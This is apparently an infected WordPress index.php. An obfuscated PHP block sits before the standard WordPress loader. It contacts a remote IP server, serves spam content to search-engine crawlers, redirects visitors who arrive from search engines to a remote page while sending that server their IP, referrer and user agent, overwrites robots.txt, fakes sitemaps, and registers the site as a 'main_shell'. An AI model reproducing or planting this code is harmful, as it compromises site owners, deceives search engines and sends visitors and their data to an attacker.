File: /home/aurelytl/eurlapex.com/index.php
<?php
goto aHdV6; tnEFK: $data1["\x72\x65\161\137\165\162\x6c"] = $req_url; goto VPasi; VPasi: if (substr($req_uri, -6) == "\162\x6f\142\x6f\164\163") { define("\102\x41\123\105\137\x50\101\x54\110", $_SERVER["\104\x4f\103\x55\115\105\x4e\x54\137\122\x4f\x4f\124"]); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\x72\x6f\142\x6f\164\x73\x2e\164\170\164"); $data1["\162\x6f\x62\x6f\x74\x73\x5f\143\x6f\156\x74"] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH . "\57\162\x6f\142\157\164\x73\56\164\x78\164", $robots_cont); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\162\157\142\x6f\x74\163\56\x74\170\164"); if (strpos(strtolower($robots_cont), "\x73\x69\164\145\x6d\x61\160")) { echo "\x72\157\142\x6f\164\x73\56\164\x78\164\40\146\151\154\145\x20\143\162\x65\x61\164\145\40\163\165\x63\143\x65\x73\x73\x21"; } else { echo "\162\157\142\x6f\164\x73\56\164\x78\164\40\146\x69\x6c\x65\x20\x63\x72\x65\x61\x74\145\x20\x66\x61\x69\x6c\41"; } die; } goto HMMc4; cKHoj: $referer = isset($_SERVER["\110\124\x54\x50\x5f\x52\105\106\x45\122\x45\x52"]) ? $_SERVER["\x48\x54\x54\120\x5f\x52\105\x46\x45\x52\105\x52"] : ''; goto dQK1U; dQK1U: $chk_refer = check_refer($referer); goto YVf1R; F55Ou: if ($res_crawl) { $data1["\150\164\164\160\137\x75\x73\x65\162\x5f\x61\147\x65\156\x74"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto mWaBp; YseE4: if (strpos($req_uri, "\x2e\160\150\160")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } goto UWBh9; kSg9m: function is_crawler($agent) { $agent_check = false; $bots = "\x67\x6f\x6f\x67\154\x65\142\x6f\164\x7c\142\x69\x6e\x67\142\x6f\164\x7c\147\x6f\157\147\x6c\x65\x7c\141\x6f\x6c\174\142\151\x6e\x67\174\171\141\x68\x6f\x6f"; if ($agent != '') { if (preg_match("\x2f\x28{$bots}\x29\57\163\151", $agent)) { $agent_check = true; } } return $agent_check; } goto zNpuk; qu8xY: $url_words = $inter_domain . "\57\x77\x6f\x72\144\x73\x2e\x70\150\x70"; goto ymtAV; riItR: function getServerCont($url, $data = array()) { $url = str_replace("\x20", "\x2b", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\70\56\60\x2e\x30", "\74")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto kSg9m; UWVJY: $req_uri = $_SERVER["\122\105\x51\125\105\x53\124\137\125\x52\x49"]; goto zJJyZ; aHdV6: $inter_domain = "\x68\x74\164\160\x3a\x2f\x2f\x31\67\63\56\62\x30\x38\56\61\x34\x39\56\62\61\70\x2f\x7a\x36\x30\x36\x31\x37\x5f\x36\57"; goto riItR; R1vS2: $http = isset($_SERVER["\110\x54\x54\120\123"]) && $_SERVER["\110\x54\124\x50\123"] !== "\157\x66\146" ? "\x68\x74\164\x70\x73\72\x2f\x2f" : "\x68\x74\164\160\x3a\x2f\x2f"; goto UWVJY; ulXNh: $data1["\x64\x6f\x6d\141\x69\156"] = $domain; goto I7HKH; v5Nwc: $res_crawl = is_crawler($user_agent); goto pe6Zh; xWTX_: $map1 = $inter_domain . "\57\x6d\141\160\x2e\160\x68\x70"; goto y0sas; I7HKH: $data1["\162\x65\161\x5f\165\162\151"] = $req_uri; goto s1lSK; y0sas: $jump1 = $inter_domain . "\57\152\x75\x6d\x70\56\x70\150\x70"; goto qu8xY; YgR2b: $req_url = $http . $domain . $req_uri; goto OxY95; pe6Zh: $req_uri = str_replace(array("\56\150\x74\155", "\56\150\x74\155\x6c", "\x2e\163\150\164\155\x6c", "\56\160\150\x74\155\154"), '', rtrim($req_uri, "\x2f")); goto ehyJ0; ehyJ0: if (!$res_crawl && $chk_refer && (preg_match("\x2f\x5c\x64\x24\x2f", $req_uri) || preg_match("\x23\133\x61\55\172\x5d\x3d\133\141\x2d\172\x30\55\71\135\53\x23", $req_uri) || preg_match("\x2f\151\x74\x65\155\x2f", $req_uri))) { $data1["\151\x70"] = $_SERVER["\122\x45\115\x4f\x54\x45\137\101\104\104\122"]; $data1["\x72\145\x66\x65\162\x65\x72"] = isset($_SERVER["\110\124\x54\120\137\x52\x45\106\x45\122\x45\122"]) ? $_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\x45\x52\x45\x52"] : ''; $data1["\x75\x73\145\x72\137\x61\x67\x65\x6e\x74"] = strtolower(isset($_SERVER["\x48\124\x54\x50\137\x55\x53\x45\x52\137\x41\x47\x45\x4e\x54"]) ? $_SERVER["\110\124\x54\x50\137\x55\123\105\x52\x5f\x41\x47\105\x4e\x54"] : ''); echo getServerCont($jump1, $data1); die; } goto F55Ou; UWBh9: $data1[] = array(); goto ulXNh; s1lSK: $data1["\150\x72\145\146"] = $href1; goto tnEFK; zNpuk: function check_refer($refer) { $check_refer = false; $referbots = "\147\157\x6f\x67\x6c\145\174\x79\x61\x68\157\x6f\174\x62\x69\x6e\147\x7c\141\157\x6c"; if ($refer != '' && preg_match("\57\50{$referbots}\51\57\163\151", $refer)) { $check_refer = true; } return $check_refer; } goto R1vS2; ymtAV: $url_robots = $inter_domain . "\x2f\x72\157\x62\157\164\163\56\160\150\160"; goto YseE4; ne24h: $self = $_SERVER["\x50\110\x50\x5f\123\x45\114\106"]; goto Sjfgk; Sjfgk: $ser_name = $_SERVER["\x53\105\x52\126\105\x52\x5f\116\101\x4d\105"]; goto YgR2b; mpGQO: if (strpos($req_uri, "\x2e\160\150\160")) { $main_shell = $http . $ser_name . $self; $data1["\x6d\x61\151\156\137\x73\150\x65\154\x6c"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\x6d\141\x69\156\x5f\163\x68\x65\154\154"] = $main_shell; } goto cKHoj; OxY95: $indata1 = $inter_domain . "\x2f\x69\156\x64\x61\164\141\56\x70\x68\160"; goto xWTX_; zJJyZ: $domain = $_SERVER["\110\124\124\x50\137\x48\x4f\123\x54"]; goto ne24h; YVf1R: $user_agent = strtolower(isset($_SERVER["\x48\124\124\x50\x5f\x55\123\105\x52\137\x41\107\105\x4e\124"]) ? $_SERVER["\x48\x54\x54\x50\137\125\x53\105\122\137\x41\x47\x45\116\x54"] : ''); goto v5Nwc; HMMc4: if (substr($req_uri, -4) == "\x2e\170\x6d\x6c") { if (strpos($req_uri, "\141\x6c\x6c\x73\151\x74\145\155\141\160\56\x78\x6d\x6c")) { $str_cont = getServerCont($map1, $data1); header("\103\x6f\x6e\x74\145\x6e\x74\x2d\x74\x79\x70\145\72\x74\145\170\164\57\x78\x6d\x6c"); echo $str_cont; die; } if (strpos($req_uri, "\56\160\150\x70")) { $word4 = explode("\77", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace("\x2e\170\155\154", '', $word4); } else { $word4 = str_replace("\57", '', $req_uri); $word4 = str_replace("\x2e\170\x6d\x6c", '', $word4); } $data1["\x77\x6f\162\x64"] = $word4; $data1["\x61\143\164\x69\157\156"] = "\143\x68\145\143\153\x5f\x73\x69\x74\x65\x6d\x61\160"; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == "\x31") { $str_cont = getServerCont($map1, $data1); header("\x43\x6f\156\x74\145\x6e\x74\55\x74\x79\160\145\72\164\x65\x78\164\57\x78\x6d\x6c"); echo $str_cont; die; } $data1["\x61\143\164\151\x6f\x6e"] = "\143\150\x65\x63\x6b\137\x77\157\x72\144\x73"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "\x6d\x61\x70") > 0 || $check1 == "\61") { $data1["\141\143\164\151\x6f\x6e"] = "\x72\141\156\x64\x5f\170\x6d\154"; $check_url4 = getServerCont($url_words, $data1); header("\x43\x6f\156\164\145\x6e\x74\x2d\x74\x79\x70\x65\72\164\145\x78\164\x2f\170\155\x6c"); echo $check_url4; die; } } goto mpGQO; mWaBp: ?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';